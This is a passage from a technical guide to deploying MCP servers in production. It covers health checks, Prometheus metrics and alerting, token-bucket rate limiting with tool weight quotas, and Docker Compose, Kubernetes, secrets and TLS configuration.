    # Check tool registry
    try:
        import httpx
        async with httpx.AsyncClient(timeout=3.0) as client:
            resp = await client.get("http://127.0.0.1:3000/health")
            checks["tool_registry"] = "ok" if resp.status_code == 200 else "degraded"
    except Exception:
        checks["tool_registry"] = "unreachable"

    # Check Docker sandbox engine (run in a worker thread so the blocking
    # subprocess call does not stall the event loop)
    try:
        import subprocess
        result = await asyncio.to_thread(
            subprocess.run,
            ["docker", "info", "--format", "{{.ServerVersion}}"],
            capture_output=True, text=True, timeout=5,
        )
        checks["docker_engine"] = "ok" if result.returncode == 0 else "error"
    except Exception:
        checks["docker_engine"] = "unavailable"

    # Determine overall health status
    overall = "healthy" if not any(
        v in ("unreachable", "unavailable", "error")
        for v in checks.values()
    ) else "degraded"

    status_code = 200 if overall == "healthy" else 503

    return JSONResponse(
        {
            "status": overall,
            "checks": checks,
            "timestamp": int(time.time()),
        },
        status_code=status_code,
    )

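Kubernetes probes referencing this endpoint are shown below. Because the check fails whenever a dependency is down, it fits the readiness probe best. Pointing the liveness probe at the same deep check means a registry or Docker outage will restart otherwise healthy pods, so consider a shallow liveness endpoint in practice: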

# k8s-deployment.yaml excerpt — MCP Server liveness & readiness probes
livenessProbe:
  httpGet:
    path: /health
    port: 3000
  initialDelaySeconds: 30
  periodSeconds: 15
  failureThreshold: 3

readinessProbe:
  httpGet:
    path: /health
    port: 3000
  initialDelaySeconds: 10
  periodSeconds: 10
  failureThreshold: 2

Prometheus metrics and alerting

Tracing and logging help you troubleshoot after a problem occurs. Metrics and alerting help you catch problems before users notice. Here are the core Prometheus metrics every MCP Server should expose:

# metrics.py — MCP Server Prometheus metrics
from prometheus_client import Counter, Histogram, Gauge, generate_latest, CollectorRegistry
import time
import functools

# === Metric definitions ===

# Tool call counter (labeled by tool name and status)
tool_calls_total = Counter(
    "mcp_tool_calls_total",
    "Total number of tool calls",
    ["tool_name", "status"]  # status: success | error | timeout | permission_denied
)

# Tool call duration distribution
tool_call_duration_seconds = Histogram(
    "mcp_tool_call_duration_seconds",
    "Tool call duration in seconds",
    ["tool_name"],
    buckets=[0.01, 0.05, 0.1, 0.5, 1.0, 2.0, 5.0, 10.0, 30.0, 60.0]
)

# Authentication failure counter
auth_failures_total = Counter(
    "mcp_auth_failures_total",
    "Total number of authentication failures",
    ["reason"]  # reason: expired_token | invalid_token | missing_token
)

# Active connection gauge
active_connections = Gauge(
    "mcp_active_connections",
    "Current number of active client connections"
)

# Sandbox containers running
sandbox_containers_running = Gauge(
    "mcp_sandbox_containers_running",
    "Current number of sandbox containers executing"
)

# Tool call rate: no separate gauge is needed. Prometheus derives it from the
# counter at query time, e.g. rate(mcp_tool_calls_total[1m]) * 60 for calls per minute.

# === Convenience recording function ===

import asyncio  # for asyncio.TimeoutError

# PermissionDeniedError is assumed to be the exception raised by your RBAC layer;
# import it from wherever your authorization code defines it.

def record_tool_call(tool_name: str):
    """Decorator that records call count and duration for an async tool handler."""
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            start = time.perf_counter()  # Monotonic clock, unaffected by system time changes
            status = "error"             # Default covers any exception not handled below
            try:
                result = await func(*args, **kwargs)
                status = "success"
                return result
            except PermissionDeniedError:
                status = "permission_denied"
                raise
            except asyncio.TimeoutError:
                status = "timeout"
                raise
            finally:
                # Runs on every path, so each call is counted exactly once
                tool_calls_total.labels(tool_name=tool_name, status=status).inc()
                tool_call_duration_seconds.labels(tool_name=tool_name).observe(
                    time.perf_counter() - start
                )
        return wrapper
    return decorator


# Expose Prometheus /metrics endpoint
async def metrics_endpoint(request):
    """Prometheus metrics scrape endpoint."""
    from starlette.responses import PlainTextResponse
    return PlainTextResponse(
        generate_latest(),
        media_type="text/plain; version=0.0.4"
    )

Alerting rules and threshold guidance

Based on the metrics above, configure these alerting rules in your monitoring stack. The PromQL expressions go into Prometheus alerting rules (Prometheus evaluates them, and Alertmanager routes the resulting notifications); the thresholds apply equally in Datadog Monitors, Honeycomb Triggers, or Grafana Alerting:

| Alert Name | PromQL / Condition | Severity | Action |
| --- | --- | --- | --- |
| High tool error rate | sum(rate(mcp_tool_calls_total{status="error"}[5m])) / sum(rate(mcp_tool_calls_total[5m])) > 0.05 | P1 (Critical) | Check recent deployments, backend dependency availability |
| Tool call latency spike | histogram_quantile(0.95, sum by (le, tool_name) (rate(mcp_tool_call_duration_seconds_bucket[5m]))) > 10 | P2 (Warning) | Check backend response times, sandbox resource availability |
| Auth failure rate surge | sum(rate(mcp_auth_failures_total[5m])) > 10 (more than 10 failures per second) | P1 (Critical) | Possible attack: check client IP distribution and failure reasons |
| Abnormal sandbox count | mcp_sandbox_containers_running > 50 | P2 (Warning) | Possible zombie containers: inspect Docker processes |
| Abnormal connection count | mcp_active_connections > 1000 | P2 (Warning) | Check for connection leaks or anomalous traffic |
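The error-rate condition is a ratio of two aggregated quantities: the increase in error calls divided by the increase in all calls over the same window, summed across every tool and status label. The sketch below reproduces that arithmetic on two counter snapshots. `error_ratio` is a hypothetical helper, and it ignores counter resets, which Prometheus's rate() handles for you.

```python
from typing import Dict, Tuple

# Counter samples keyed by (tool_name, status), mirroring the metric's labels.
Snapshot = Dict[Tuple[str, str], float]


def error_ratio(before: Snapshot, after: Snapshot) -> float:
    """Share of calls that ended in status="error" between two snapshots."""
    total = 0.0
    errors = 0.0
    for key, value in after.items():
        delta = value - before.get(key, 0.0)
        total += delta
        if key[1] == "error":
            errors += delta
    return errors / total if total else 0.0
```

For example, if successes grow from 100 to 190 and errors from 2 to 12 within the window, the ratio is 10 / 100 = 0.10, which is above the 0.05 threshold. Dividing without aggregating first would compare each error series only with itself, because the two sides would match on identical labels.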

Integrating with cloud monitoring stacks

| Signal Type | AWS Stack | GCP Stack | Vendor-Agnostic |
| --- | --- | --- | --- |
| Tracing | AWS X-Ray (via ADOT Collector) | Cloud Trace | Honeycomb, Datadog APM |
| Logging | CloudWatch Logs | Cloud Logging | ELK, Loki, Datadog Logs |
| Metrics | CloudWatch Metrics + AMP | Cloud Monitoring | Prometheus + Grafana, Datadog |
| Alerting | CloudWatch Alarms → SNS | Cloud Monitoring → PagerDuty | PagerDuty, Opsgenie, Grafana OnCall |

In all cases, route alerts through PagerDuty or your incident management platform of choice. With Prometheus, the integration point is Alertmanager, which has built-in receivers for PagerDuty, Slack, and Opsgenie plus a generic webhook receiver. Set up escalation policies so a P1 alert that isn't acknowledged within 5 minutes automatically escalates to the next responder.

Observability is the last line of defense in production—it doesn't prevent problems, but it ensures you know about them the moment they happen, with enough data to trace the root cause. Together with authentication (line 1) and sandbox isolation (line 2), it forms the three-layer defense for production MCP Server deployments.

For more on monitoring production LLM systems:

  • Multi-Agent Debate — Let AI Agents Challenge Each Other

7. Rate Limiting and Abuse Prevention

An MCP Server without rate limiting is a DDoS invitation

Authentication and authorization answer "who can call" and "what can they call." But even a legitimate, authenticated user can—intentionally or accidentally—flood your server with tool calls and exhaust all available resources.

In the MCP context, rate limiting faces three unique challenges:

  • LLM "tool frenzy": An AI Agent in its reasoning loop may fire 10-30 consecutive tool calls. If each call spins up a Docker container, resource consumption multiplies with the number of active agents (10 agents × 30 calls is 300 containers).
  • Streaming long-lived connections: Streamable HTTP SSE connections can last minutes. Traditional "requests per second" rate models don't cleanly map to long-running tool executions.
  • Multi-client shared server: A single MCP Server instance serves multiple clients. One abusive client must never degrade the experience of others.

The solution: token-bucket rate limiting with per-client quota isolation.

Token-bucket rate limiter middleware (TypeScript)

The token-bucket algorithm is one of the most common rate-limiting strategies in production: tokens refill into a bucket at a fixed rate, each request consumes one token, and requests are rejected when the bucket is empty. It naturally supports burst traffic (the bucket capacity is the burst ceiling) and avoids the double burst that fixed-window counters allow at window boundaries.

// rate-limiter.ts — MCP Server token-bucket rate limiter middleware
// Independent of the auth layer; can be stacked

interface TokenBucket {
  tokens: number;         // Current available tokens
  lastRefill: number;     // Last refill timestamp (ms)
  capacity: number;       // Bucket capacity (max tokens)
  refillRate: number;     // Token refill rate (tokens/sec)
}

class RateLimiter {
  private buckets: Map<string, TokenBucket> = new Map();

  constructor(
    private defaultCapacity: number = 60,     // Default 60 tokens (burst capacity)
    private defaultRefillRate: number = 10,   // Default 10 tokens/sec refill
  ) {}

  /**
   * Retrieve or create a token bucket for a given client.
   * @param clientId — Client identifier (Mcp-Session-Id or user_id)
   * @param config   — Optional per-client capacity and rate override
   */
  private getBucket(
    clientId: string,
    config?: { capacity?: number; refillRate?: number }
  ): TokenBucket {
    if (!this.buckets.has(clientId)) {
      this.buckets.set(clientId, {
        tokens: config?.capacity ?? this.defaultCapacity,
        lastRefill: Date.now(),
        capacity: config?.capacity ?? this.defaultCapacity,
        refillRate: config?.refillRate ?? this.defaultRefillRate,
      });
    }
    return this.buckets.get(clientId)!;
  }

  /**
   * Attempt to consume one token.
   * @returns { allowed: boolean, retryAfter?: number, remaining: number }
   */
  tryConsume(
    clientId: string,
    config?: { capacity?: number; refillRate?: number }
  ): { allowed: boolean; retryAfter?: number; remaining: number } {
    const bucket = this.getBucket(clientId, config);
    const now = Date.now();

    // Calculate tokens to add since last refill
    const elapsed = (now - bucket.lastRefill) / 1000; // seconds
    const tokensToAdd = elapsed * bucket.refillRate;
    bucket.tokens = Math.min(bucket.capacity, bucket.tokens + tokensToAdd);
    bucket.lastRefill = now;

    if (bucket.tokens >= 1) {
      bucket.tokens -= 1;
      return { allowed: true, remaining: Math.floor(bucket.tokens) };
    }

    // Estimate wait time until next token refills (seconds)
    const waitSeconds = Math.ceil((1 - bucket.tokens) / bucket.refillRate);
    return { allowed: false, retryAfter: waitSeconds, remaining: 0 };
  }

  /** Purge buckets inactive for >10 minutes to prevent memory growth */
  cleanup(maxAgeMs: number = 600_000): void {
    const now = Date.now();
    for (const [clientId, bucket] of this.buckets) {
      if (now - bucket.lastRefill > maxAgeMs) {
        this.buckets.delete(clientId);
      }
    }
  }
}

// Global singleton
export const rateLimiter = new RateLimiter();

// Purge stale buckets every 60 seconds
setInterval(() => rateLimiter.cleanup(), 60_000);

Key design choices in this token-bucket implementation:

  • Lazy refill: Tokens are calculated on-demand during each request rather than via a background timer—simpler, no extra threads.
  • Per-client isolation: Each client gets an independent token bucket. One user's burst never starves another's quota.
  • Overridable config: Different clients can have different capacities and rates—VIP tenants get more generous quotas.
  • Auto-cleanup: Buckets idle for 10+ minutes are automatically purged, preventing unbounded memory growth.
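
Because the limiter reads Date.now() directly, its burst and refill behavior is awkward to unit-test. The following is a minimal sketch of the same lazy-refill arithmetic with an injectable clock. SimBucket, Clock, and the fake clock are illustrative names, not part of the limiter above.

```typescript
// Sketch: lazy-refill token bucket with an injectable clock (illustrative names).
type Clock = () => number; // returns the current time in milliseconds

class SimBucket {
  private tokens: number;
  private lastRefill: number;
  private readonly capacity: number;
  private readonly refillRate: number; // tokens per second
  private readonly now: Clock;

  constructor(capacity: number, refillRate: number, now: Clock) {
    this.capacity = capacity;
    this.refillRate = refillRate;
    this.now = now;
    this.tokens = capacity; // a new bucket starts full
    this.lastRefill = now();
  }

  tryConsume(): boolean {
    const t = this.now();
    const elapsedSeconds = (t - this.lastRefill) / 1000;
    // Refill lazily, never beyond capacity
    this.tokens = Math.min(this.capacity, this.tokens + elapsedSeconds * this.refillRate);
    this.lastRefill = t;
    if (this.tokens >= 1) {
      this.tokens -= 1;
      return true;
    }
    return false;
  }
}

// Drive the bucket with a fake clock instead of real time
let fakeNow = 0;
const bucket = new SimBucket(60, 10, () => fakeNow);

// Fire n back-to-back requests and count how many are admitted
function burst(n: number): number {
  let admitted = 0;
  for (let i = 0; i < n; i++) {
    if (bucket.tryConsume()) admitted++;
  }
  return admitted;
}

const firstBurst = burst(100);      // 60: the full bucket is spent
fakeNow += 1_000;
const afterOneSecond = burst(100);  // 10: one second of refill at 10 tokens/sec
fakeNow += 60_000;
const afterIdleMinute = burst(100); // 60: refill is capped at capacity
```

The three results show the properties the design relies on: the burst ceiling equals the capacity, the sustained rate equals the refill rate, and idle time never stockpiles more than one full bucket.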

Integrating rate limiting into the MCP HTTP Server

Embed the rate limiter as Express middleware, applied after authentication but before tool execution:

// mcp-middleware.ts — Rate limiting integrated into MCP HTTP Server
import express from "express";
import { rateLimiter } from "./rate-limiter";
// Assumed module paths for pieces defined in earlier sections; adjust to your layout
import { authMiddleware } from "./auth";
import { mcp_rate_limited_total } from "./metrics";
import { mcpHandler } from "./mcp-handler";

const app = express();

// Layer 1: Auth middleware (validates Bearer token, extracts user_id)
app.use("/mcp", authMiddleware);

// Layer 2: Rate limiting middleware (per-client quota check)
app.use("/mcp", (req, res, next) => {
  // Identify client: auth-injected userId > Mcp-Session-Id header > fallback to IP.
  // The verified identity goes first because the session header is client-supplied;
  // keying on it would let a caller get a fresh bucket by rotating session IDs.
  const clientId: string = (req as any).userId
    || (req.headers["mcp-session-id"] as string | undefined)
    || req.ip
    || "unknown";

  const result = rateLimiter.tryConsume(clientId);

  // Track rate-limit hits (feed into Prometheus metrics)
  if (!result.allowed) {
    mcp_rate_limited_total.labels(clientId).inc();
  }

  // Expose quota status via response headers
  res.setHeader("X-RateLimit-Remaining", String(result.remaining));
  res.setHeader("X-RateLimit-Limit", "60"); // Matches the limiter's default bucket capacity

  if (!result.allowed) {
    res.setHeader("Retry-After", String(result.retryAfter));
    return res.status(429).json({
      jsonrpc: "2.0",
      error: {
        code: -32000,
        message: "Rate limit exceeded. Please retry after the specified interval.",
        data: {
          retryAfter: result.retryAfter,
          clientId: clientId,
        }
      },
      id: null,
    });
  }

  next();
});

// Layer 3: MCP tool call handler
app.post("/mcp", mcpHandler);

Tool execution quotas: not all tools cost the same

A global "N requests per minute" limit is too coarse. A query_metrics call (sub-millisecond in-memory lookup) and a deploy_service call (triggers a CI/CD pipeline, may run 10+ minutes) have vastly different costs. You need tool-level weight quotas.

Tool weight table:

Tool Category | Weight | Max Concurrent | Example Tools
Light queries | 1x | 50 | query_metrics, read_logs, search_files
Medium operations | 3x | 20 | run_migration, update_config, send_notification
Heavy operations | 10x | 5 | deploy_service, provision_cluster, run_benchmark
Dangerous operations | Global mutex | 1 | delete_cluster, reset_database, revoke_access

Implementing tool weight quotas:

// tool-quota.ts — Tool weight quota management
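const TOOL_WEIGHTS: Record<string, number> = {
  query_metrics: 1,
  read_logs: 1,
  search_files: 1,
  run_migration: 3,
  update_config: 3,
  send_notification: 3,
  deploy_service: 10,
  provision_cluster: 10,
  run_benchmark: 10,
};

// Dangerous tools bypass the weight budget and run under a global mutex instead
const DANGEROUS_TOOLS = new Set(["delete_cluster", "reset_database", "revoke_access"]);
let dangerousToolRunning = false;

// Weighted sum of all in-flight tool calls (one heavy call counts as 10)
let activeConcurrentCalls = 0;
const MAX_CONCURRENT_CALLS = 50;

// Reserves capacity when it returns allowed: true. The caller must then call
// releaseToolQuota(toolName) in a finally block once the tool finishes.
function checkToolQuota(toolName: string, userId: string): { allowed: boolean; reason?: string } {
  // Dangerous operations: global mutex (in-process flag here; use a Redis
  // distributed lock with a TTL in production so it holds across replicas)
  if (DANGEROUS_TOOLS.has(toolName)) {
    if (dangerousToolRunning) {
      return { allowed: false, reason: `Dangerous operation already running; ${toolName} denied for ${userId}` };
    }
    dangerousToolRunning = true;
    return { allowed: true };
  }

  const weight = TOOL_WEIGHTS[toolName] ?? 1;

  // Concurrent call budget check
  if (activeConcurrentCalls + weight > MAX_CONCURRENT_CALLS) {
    return {
      allowed: false,
      reason: `Server busy: active weight ${activeConcurrentCalls}, tool weight ${weight}, exceeds limit ${MAX_CONCURRENT_CALLS}`
    };
  }

  activeConcurrentCalls += weight;
  return { allowed: true };
}

// Returns the capacity reserved by a successful checkToolQuota() call
function releaseToolQuota(toolName: string): void {
  if (DANGEROUS_TOOLS.has(toolName)) {
    dangerousToolRunning = false;
    return;
  }
  activeConcurrentCalls = Math.max(0, activeConcurrentCalls - (TOOL_WEIGHTS[toolName] ?? 1));
}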
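
The "Max Concurrent" column of the weight table can also be enforced directly, one cap per category. The sketch below is one possible shape for that gate, not a definitive implementation: Category, TOOL_CATEGORY, tryAcquire, and withToolSlot are hypothetical names, the counters are in-process only, and treating unknown tools as "light" is an assumption you may want to invert.

```typescript
// Sketch: per-category concurrency caps taken from the weight table (illustrative names).
type Category = "light" | "medium" | "heavy" | "dangerous";

const MAX_CONCURRENT: Record<Category, number> = {
  light: 50,
  medium: 20,
  heavy: 5,
  dangerous: 1, // acts as a global mutex for all dangerous tools
};

const TOOL_CATEGORY: Record<string, Category> = {
  query_metrics: "light",
  read_logs: "light",
  search_files: "light",
  run_migration: "medium",
  update_config: "medium",
  send_notification: "medium",
  deploy_service: "heavy",
  provision_cluster: "heavy",
  run_benchmark: "heavy",
  delete_cluster: "dangerous",
  reset_database: "dangerous",
  revoke_access: "dangerous",
};

const inFlight: Record<Category, number> = { light: 0, medium: 0, heavy: 0, dangerous: 0 };

// Returns a release function on success, or null when the category is at its cap.
function tryAcquire(toolName: string): (() => void) | null {
  const category: Category = TOOL_CATEGORY[toolName] ?? "light"; // assumption: unknown tools are light
  if (inFlight[category] >= MAX_CONCURRENT[category]) return null;
  inFlight[category] += 1;
  let released = false;
  return () => {
    if (!released) { // idempotent: a double release must not free someone else's slot
      released = true;
      inFlight[category] -= 1;
    }
  };
}

// Wrap a tool execution so the slot is always returned, even when the tool throws.
async function withToolSlot<T>(toolName: string, run: () => Promise<T>): Promise<T> {
  const release = tryAcquire(toolName);
  if (release === null) {
    throw new Error(`Tool ${toolName} is at its concurrency cap`);
  }
  try {
    return await run();
  } finally {
    release();
  }
}
```

Handing back a release function and calling it in a finally block keeps the counters honest when a tool throws or times out. Across multiple replicas the same idea needs shared state (for example a Redis counter or lock), which this sketch does not cover.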

Multi-layer DoS protection strategies

Layer | Strategy | Implementation | Defends Against
Network | IP-level rate limiting + connection caps | Nginx limit_req_zone + limit_conn | HTTP request floods, IP-level abuse
Application | Token-bucket per-client rate limiting | Custom middleware (code in this section) | Single-client high-frequency calls, tool enumeration attacks
Tool | Weight quotas + concurrency caps | checkToolQuota() pre-execution gate | Heavy tools starving resources, dangerous operation conflicts
Sandbox | CPU/memory hard limits + timeout kill | Docker cgroups + timeout_seconds | Single tool execution resource explosion
Observability | Rate-limit hit counter + anomaly alerting | Prometheus mcp_rate_limited_total metric | Early detection of attack patterns, rate-limit parameter tuning

Rate limiting isn't about "as strict as possible." Too strict degrades the user experience; too loose offers no protection. Start with generous parameters (e.g., 60 tokens per bucket, 10 tokens/sec refill) and gradually tighten based on Prometheus metrics and real-world usage patterns.
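
When tuning, it helps to translate bucket parameters into the two numbers people usually reason about: how many calls a client can make in a window, and how long an exhausted client waits to get its burst back. This is a small arithmetic sketch; BucketParams and both helper names are illustrative.

```typescript
// Sketch: what a (capacity, refillRate) pair means in practice (illustrative names).
interface BucketParams {
  capacity: number;   // burst ceiling, in tokens
  refillRate: number; // tokens per second
}

// Upper bound on calls admitted in a window that starts with a full bucket
function maxCallsInWindow(p: BucketParams, windowSeconds: number): number {
  return Math.floor(p.capacity + p.refillRate * windowSeconds);
}

// Seconds an empty bucket needs to regain its full burst allowance
function secondsToFullBurst(p: BucketParams): number {
  return p.capacity / p.refillRate;
}

const defaults: BucketParams = { capacity: 60, refillRate: 10 };
const perMinuteCeiling = maxCallsInWindow(defaults, 60); // 60 + 10 * 60 = 660
const recoverySeconds = secondsToFullBurst(defaults);    // 60 / 10 = 6
```

With the suggested starting parameters a single client can make up to 660 calls in its first minute, so the 60 is a burst size, not a per-minute limit. A 30-call agent loop fits inside one burst, and an exhausted bucket is full again after 6 seconds.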

8. Production Deployment Checklist

From code to production: a complete deployment map

The previous seven sections cover MCP Server security hardening, architecture design, and observability. This section ties them all together—what you need to do, and in what order, when you're ready to go live.

The checklist below is ordered by deployment stage. Each item is tagged with a priority (P0 = must complete before launch, P1 = strongly recommended, P2 = iterate post-launch):

  1. P0: Transport hardening — Switch to Streamable HTTP + TLS termination (see Section 2)
  2. P0: Authentication & authorization — OAuth 2.1 Bearer Token + tool-level RBAC (see Section 3)
  3. P0: Tool sandboxing — Docker container isolation + network restrictions (see Section 4)
  4. P1: Multi-server gateway — Nginx reverse proxy + tool routing (see Section 5)
  5. P1: Observability — OpenTelemetry tracing + structured logging + Prometheus metrics (see Section 6)
  6. P1: Rate limiting & anti-abuse — Token bucket + tool weight quotas (see Section 7)
  7. P2: Containerized deployment — Docker Compose / Kubernetes (this section)
  8. P2: CI/CD pipeline — Automated build, test, release (this section)
  9. P2: Secrets management — Env vars → Vault upgrade path (this section)
  10. P2: Rolling updates & rollback — Zero-downtime deployment strategy (this section)

Docker Compose deployment: from single process to containerized

The minimal production-grade deployment—one docker-compose.yml covering MCP Server + Nginx gateway + Prometheus monitoring:

# docker-compose.yml — MCP production single-host deployment
version: "3.9"

services:
  # === MCP Server core service ===
  mcp-server:
    build:
      context: .
      dockerfile: Dockerfile
    container_name: mcp-server
    restart: unless-stopped
    ports:
      - "127.0.0.1:3000:3000"          # Localhost only, proxied by Nginx
    environment:
      - MCP_TRANSPORT=http
      - MCP_PORT=3000
      - JWT_SECRET=${JWT_SECRET}       # Injected from .env file
      - JWT_ISSUER=https://auth.example.com
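      - OTEL_EXPORTER_OTLP_ENDPOINT=http://jaeger:4317  # Assumes an OTLP receiver reachable as "jaeger" (not defined in this file)
      - DOCKER_HOST=unix:///var/run/docker.sock  # Sandbox needs Docker socket
    volumes:
      # Caution: access to the Docker socket is root-equivalent on the host.
      # Keep this container's attack surface small, or put a restricting socket proxy in front.
      - /var/run/docker.sock:/var/run/docker.sock  # Enable sandbox container launch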
      - mcp-logs:/var/log/mcp
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:3000/health"]
      interval: 15s
      timeout: 5s
      retries: 3
    deploy:
      resources:
        limits:
          cpus: "2"
          memory: "512M"

  # === Nginx reverse proxy (TLS termination + rate limiting) ===
  nginx:
    image: nginx:1.25-alpine
    container_name: mcp-nginx
    restart: unless-stopped
    ports:
      - "443:443"
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf:ro
      - ./certs:/etc/ssl/certs:ro          # TLS certs (read-only mount)
      - nginx-logs:/var/log/nginx
    depends_on:
      - mcp-server
    healthcheck:
      test: ["CMD", "nginx", "-t"]           # Validates the config only; does not prove the proxy is serving traffic
      interval: 30s
      timeout: 5s
      retries: 3

  # === Prometheus metrics collection ===
  prometheus:
    image: prom/prometheus:v2.48.0
    container_name: mcp-prometheus
    restart: unless-stopped
    ports:
      - "127.0.0.1:9090:9090"
    volumes:
      - ./prometheus.yml:/etc/prometheus/prometheus.yml:ro
      - prometheus-data:/prometheus
    command:
      - "--config.file=/etc/prometheus/prometheus.yml"
      - "--storage.tsdb.retention.time=30d"

volumes:
  mcp-logs:
  nginx-logs:
  prometheus-data:

Accompanying .env file (never commit to Git):

# .env — Production environment variables (injected via Docker Compose, never in the image)
JWT_SECRET=your-production-jwt-secret-min-32-chars
JWT_ISSUER=https://auth.example.com
MCP_TRANSPORT=http
MCP_PORT=3000
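
A server that starts with a missing or placeholder secret is worse than one that refuses to start. The following is a minimal fail-fast sketch for the variables in this .env file. McpConfig and loadConfig are hypothetical names, and the specific rules (32-character minimum, https issuer, rejecting values that start with "your-") are assumptions drawn from the placeholder values above, not requirements of MCP.

```typescript
// Sketch: validate environment variables at startup and fail fast (illustrative names).
interface McpConfig {
  transport: "http" | "stdio";
  port: number;
  jwtSecret: string;
  jwtIssuer: string;
}

function loadConfig(env: Record<string, string | undefined>): McpConfig {
  const errors: string[] = [];

  const jwtSecret = env["JWT_SECRET"] ?? "";
  if (jwtSecret.length < 32) {
    errors.push("JWT_SECRET must be at least 32 characters");
  }
  if (jwtSecret.startsWith("your-")) {
    errors.push("JWT_SECRET still looks like the template placeholder");
  }

  const jwtIssuer = env["JWT_ISSUER"] ?? "";
  if (!jwtIssuer.startsWith("https://")) {
    errors.push("JWT_ISSUER must be an https:// URL");
  }

  const port = Number(env["MCP_PORT"] ?? "3000");
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    errors.push("MCP_PORT must be an integer between 1 and 65535");
  }

  const transport = env["MCP_TRANSPORT"] ?? "http";
  if (transport !== "http" && transport !== "stdio") {
    errors.push("MCP_TRANSPORT must be 'http' or 'stdio'");
  }

  if (errors.length > 0) {
    // Report every problem at once so a deploy does not fail one variable at a time
    throw new Error(`Invalid configuration:\n- ${errors.join("\n- ")}`);
  }
  return { transport: transport as "http" | "stdio", port, jwtSecret, jwtIssuer };
}

// Typical use at process start (not executed here):
//   const config = loadConfig(process.env);
```

Collecting all errors before throwing makes a failed container start self-explanatory in the logs. Note that the error messages name the variables but never echo their values.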

Kubernetes deployment: multi-replica + autoscaling

Docker Compose works for single-host or small deployments. For production environments requiring high availability and autoscaling, Kubernetes is the standard choice:

# k8s/deployment.yaml — MCP Server Kubernetes Deployment
apiVersion: apps/v1
kind: Deployment
metadata:
  name: mcp-server
  namespace: mcp-production
  labels:
    app: mcp-server
spec:
  replicas: 3                        # 3 replicas for high availability
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxSurge: 1                    # At most 1 extra Pod during rollout
      maxUnavailable: 0              # Zero downtime during rollout
  selector:
    matchLabels:
      app: mcp-server
  template:
    metadata:
      labels:
        app: mcp-server
        version: "1.0.0"
    spec:
      serviceAccountName: mcp-server-sa
      containers:
        - name: mcp-server
          image: registry.example.com/mcp-server:1.0.0
          imagePullPolicy: IfNotPresent
          ports:
            - containerPort: 3000
              name: http
            - containerPort: 9090
              name: metrics
          env:
            - name: MCP_TRANSPORT
              value: "http"
            - name: MCP_PORT
              value: "3000"
            # Secrets injected from Kubernetes Secret
            - name: JWT_SECRET
              valueFrom:
                secretKeyRef:
                  name: mcp-secrets
                  key: jwt-secret
            - name: JWT_ISSUER
              valueFrom:
                secretKeyRef:
                  name: mcp-secrets
                  key: jwt-issuer
            - name: OTEL_EXPORTER_OTLP_ENDPOINT
              value: "http://otel-collector:4317"
          resources:
            requests:
              cpu: "500m"
              memory: "256Mi"
            limits:
              cpu: "2"
              memory: "512Mi"
          livenessProbe:
            httpGet:
              path: /health
              port: 3000
            initialDelaySeconds: 30
            periodSeconds: 15
            failureThreshold: 3
          readinessProbe:
            httpGet:
              path: /health
              port: 3000
            initialDelaySeconds: 10
            periodSeconds: 10
            failureThreshold: 2
          volumeMounts:
            - name: docker-sock
              mountPath: /var/run/docker.sock  # Only needed for Docker sandbox mode; requires nodes running Docker Engine (containerd-only nodes have no such socket)
      volumes:
        - name: docker-sock
          hostPath:
            path: /var/run/docker.sock
---
# k8s/service.yaml — MCP Server Service
apiVersion: v1
kind: Service
metadata:
  name: mcp-server
  namespace: mcp-production
spec:
  selector:
    app: mcp-server
  ports:
    - name: http
      port: 3000
      targetPort: 3000
    - name: metrics
      port: 9090
      targetPort: 9090
  type: ClusterIP
---
# k8s/hpa.yaml — Horizontal Pod Autoscaler
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: mcp-server-hpa
  namespace: mcp-production
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: mcp-server
  minReplicas: 3
  maxReplicas: 10
  metrics:
    - type: Resource
      resource:
        name: cpu
        target:
          type: Utilization
          averageUtilization: 70
    - type: Resource
      resource:
        name: memory
        target:
          type: Utilization
          averageUtilization: 80

Secrets management: from env vars to Vault—the maturity path

Secrets management security exists on a gradient:

Stage | Approach | Security | When Appropriate
🚫 Hardcoded | Written in source or config files | ❌ Secrets in Git history, irreversible once leaked | Never for production
⚠️ Env vars | export JWT_SECRET=xxx / Docker --env | ⚠️ Leakable via /proc/<pid>/environ or container inspect | Small deployments; a clear step up from hardcoding
✅ K8s Secrets | Kubernetes Secret + RBAC access control | ✅ RBAC-gated access; encrypted in etcd once encryption at rest is enabled (values are only base64-encoded by default) | Recommended for K8s clusters
✅✅ Vault | HashiCorp Vault / AWS Secrets Manager / GCP Secret Manager | ✅✅ Dynamic secrets + auto-rotation + audit logging | Multi-cluster, compliance-heavy production environments

Recommended path: start with K8s Secrets. For the vast majority of teams, Kubernetes Secrets (paired with etcd encryption at rest and strict RBAC) provide sufficient security. Upgrade to Vault (or AWS Secrets Manager / GCP Secret Manager) when you span multiple clusters or need automatic secret rotation and audit logging for compliance.

TLS certificate automation: cert-manager + Let's Encrypt

Manually managing TLS certificates is unsustainable in production—a forgotten renewal means a production outage. In Kubernetes, cert-manager automates certificate issuance and renewal from Let's Encrypt end-to-end:

# k8s/cert-manager.yaml — Automated TLS certificate management
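# Prerequisite: cert-manager installed via Helm, including its CRDs
#   helm repo add jetstack https://charts.jetstack.io
#   helm install cert-manager jetstack/cert-manager --namespace cert-manager --create-namespace
#   (also enable CRD installation using the chart value documented for your cert-manager version)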

---
# ClusterIssuer: Let's Encrypt production issuer
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
  name: letsencrypt-prod
spec:
  acme:
    server: https://acme-v02.api.letsencrypt.org/directory
    email: ops@example.com               # Placeholder address; receives certificate expiry notifications
    privateKeySecretRef:
      name: letsencrypt-prod-account-key
    solvers:
      - http01:
          ingress:
            class: nginx                 # HTTP-01 challenge via Nginx Ingress

---
# Certificate: request cert for the MCP gateway domain
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: mcp-gateway-tls
  namespace: mcp-production
spec:
  secretName: mcp-gateway-tls-secret    # Secret where the cert is stored
  issuerRef:
    name: letsencrypt-prod
    kind: ClusterIssuer
  dnsNames:
    - mcp-gateway.example.com
    - mcp.example.com
  # Auto-renew 30 days before expiry
  renewBefore: 720h  # 30 days

Nginx Ingress referencing this auto-managed certificate:

# k8s/ingress.yaml — MCP Gateway Ingress (TLS terminated at Ingress)
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: mcp-gateway
  namespace: mcp-production
